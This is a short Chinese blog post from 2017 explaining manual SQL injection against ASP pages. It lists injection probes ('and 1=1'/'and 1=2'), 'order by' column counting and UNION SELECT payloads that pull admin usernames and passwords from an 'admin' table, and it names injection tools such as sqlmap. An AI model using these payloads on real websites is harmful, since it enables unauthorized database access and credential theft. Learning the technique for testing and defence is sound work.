sql注入【手工及一些工具】

Sql注入原理分析:

  网站程序存在可控传递参数,参数未进行过滤直接带入数据库查询,导致攻击者可通过传递恶意sql语句代码进行执行攻击。

Sql注入产生条件

  1.必须有参数传递

  2.参数值带入数据库查询并执行

判断是不是用注入:

  例:http://www.xxx.xxx asp?id=xx asp?id=xx

  用'或 and 1=1 正常页面

     and 1=2  错误页面

  3.猜解列名数目

  用order by 猜解有多少个列名。

  Order by 22 22 代表查询的列名的数目有22个

  http://www.xxx.xxx asp?id=xx order by 22 正常

  http://www.xxx.xxx asp?id=xx order by 23 错误

  4.猜解表名 确定存在admin表名

  http://www.xxx.xxx asp?id=xx UNION SELECT

  1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

  5.猜解列名 猜解数据

  http://www.xxx.xxx asp?id=xx  UNION SELECT

  1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

 

  注入工具:

  啊D,明小子,穿山甲,萝卜头,sqlmap

  工具功能性:

  支持数据库类型,支持注入类型,注入突破类型,工具速度

posted @ 2017-01-17 15:45  xiaohaimian'sBlog  阅读(394)  评论(0编辑  收藏  举报